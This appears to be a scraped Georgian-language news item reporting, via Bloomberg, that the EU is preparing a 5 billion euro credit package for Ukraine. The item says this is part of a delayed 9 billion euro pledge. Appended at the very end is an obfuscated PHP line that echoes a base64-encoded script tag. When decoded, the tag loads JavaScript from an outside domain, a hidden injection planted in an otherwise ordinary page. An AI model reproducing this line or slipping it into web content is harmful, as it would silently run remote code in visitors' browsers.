celsiusi
ავერსი შნაიდერი
ევროკავშირი უკრაინის დახმარების ახალ პაკეტს ამზადებს 5 მილიარდი ევროს ოდენობით , – ამის შესახებ ინფორმაციას Bloomberg ევროპელ დიპლომატებზე დაყრდნობით ავრცელებს.
 
ეს თანხა, 9 მილიარდი ევროს ოდენობის დახმარების იმ დიდი პაკეტის ნაწილია, რომელსაც ევროკავშირი უკრაინას ჯერ კიდევ მაისში დაპირდა, თუმცა დახმარების გადაცემის პროცესი შენელდა. როგორც გამოცემა აღნიშნავს, მიზეზი ევროკომისიასა და ევროკავშირის წევრ ქვეყნებს შორის უთანხმოება გახდა. უთანხმოების მიზეზი კი სავარაუდოდ, დახმარების პროგრამის დეტალები.
 
როგორც დიპლომატებმა განაცხადეს, ევროკომისია საკრედიტო პაკეტს უკვე მომავალ კვირას წარადგენს. თანხა განკუთვნილია გადაუდებელი ხარჯების, მათ შორის ხელფასებისა და შეღავათების დასაფარად.
455
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");